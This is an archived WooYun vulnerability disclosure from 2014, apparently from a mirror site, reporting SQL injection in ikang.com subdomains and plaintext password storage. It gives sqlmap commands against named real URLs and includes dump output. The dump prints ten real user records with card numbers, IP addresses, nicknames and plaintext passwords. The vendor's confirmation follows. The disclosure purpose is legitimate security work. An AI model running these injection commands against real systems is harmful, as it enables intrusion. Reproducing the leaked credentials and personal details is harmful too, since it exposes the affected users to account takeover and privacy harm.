乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-28: 细节已通知厂商并且等待厂商处理中 2014-08-29: 厂商已经确认,细节仅向厂商公开 2014-09-08: 细节向核心白帽子及相关领域专家公开 2014-09-18: 细节向普通白帽子公开 2014-09-28: 细节向实习白帽子公开 2014-10-12: 细节向公众公开
你懂的,不要明文存储嘛。
不要明文存密码嘛~~~~爱康有多个地方分站的子域名。有些子域名有做防注入处理,有没有没有。不知道为啥。。。。。又发现两个存在注入的分站:
sqlmap.py -u "http://xzm.ikang.com/news_article.php?id=1" --random-agent --dbssqlmap.py -u "http://cdhzb.ikang.com/news_article.php?id=1" --random-agent
目测很多分站以及其他应用使用了同一个数据库。这个注入点同样可以有33个库的权限。以web库为例。应该是主站的数据库。50万注册用户的信息明文存储,包括密码。
[13:41:56] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOS 4.9web application technology: PHP 4.4.2, Apache 2.0.52back-end DBMS: MySQL 5.0.11[13:41:56] [INFO] resumed: 529604Database: web+--------+---------+| Table | Entries |+--------+---------+| `user` | 529604 |+--------+---------+[13:41:56] [INFO] fetched data logged to text files under '/home/litdg/workspace/sqlmap/output/cqhnb.ikang.com'
测试密码可登陆主站。
web server operating system: Linux CentOS 4.9web application technology: PHP 4.4.2, Apache 2.0.52back-end DBMS: MySQL 5.0.11Database: webTable: user[10 entries]+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+| id | cardid | corpid | memberid | ip | city | type | title | email | status | content | nickname | keywords | password |+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+| 1 | 7000000000000001 | 2383 | 300535 | 60.194.121.93 | <blank> | <blank> | <blank> | [email protected] | 1 | <blank> | Raymond | <blank> | soso || 2 | 0021000000157444 | 206 | NULL | 61.129.127.226 | <blank> | <blank> | <blank> | [email protected] | 0 | <blank> | RoqueL | <blank> | anichr || 3 | 1111000000012757 | 2383 | NULL | 124.203.150.151 | <blank> | <blank> | <blank> | [email protected] | 0 | <blank> | lm_irena | <blank> | 596621 || 4 | NULL | NULL | NULL | 222.35.170.153 | <blank> | <blank> | <blank> | [email protected] | 0 | <blank> | Judy | <blank> | anichr || 5 | 1111000000016090 | 2383 | NULL | 218.23.34.152 | <blank> | <blank> | <blank> | [email protected] | 0 | <blank> | mayimin | <blank> | 550223 || 6 | NULL | NULL | NULL | 219.142.174.152 | <blank> | <blank> | <blank> | [email protected] | 0 | <blank> | Divine | <blank> | 123456 || 7 | 7000000000000003 | 2383 | NULL | 61.51.225.93 | <blank> | <blank> | <blank> | [email protected] | 0 | <blank> | motuo12345 | <blank> | 453392123 || 8 | NULL | NULL | NULL | NULL | <blank> | <blank> | <blank> | [email protected] | 0 | <blank> | 412545 | <blank> | ikang1371 || 9 | 1111000000016999 | 2383 | NULL | 218.19.161.78 | <blank> | <blank> | <blank> | [email protected] | 0 | <blank> | kong168168 | <blank> | 65124104 || 10 | 7000000000000004 | 2383 | NULL | 222.130.86.172 | <blank> | <blank> | <blank> | [email protected] | 0 | <blank> | \\?d2\\?a6\\?bd\\?f0\\?c0\\?bc | <blank> | ikang1371 |+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+
危害等级:高
漏洞Rank:20
确认时间:2014-08-29 14:44
漏洞确认,我们立即修复,谢谢!
暂无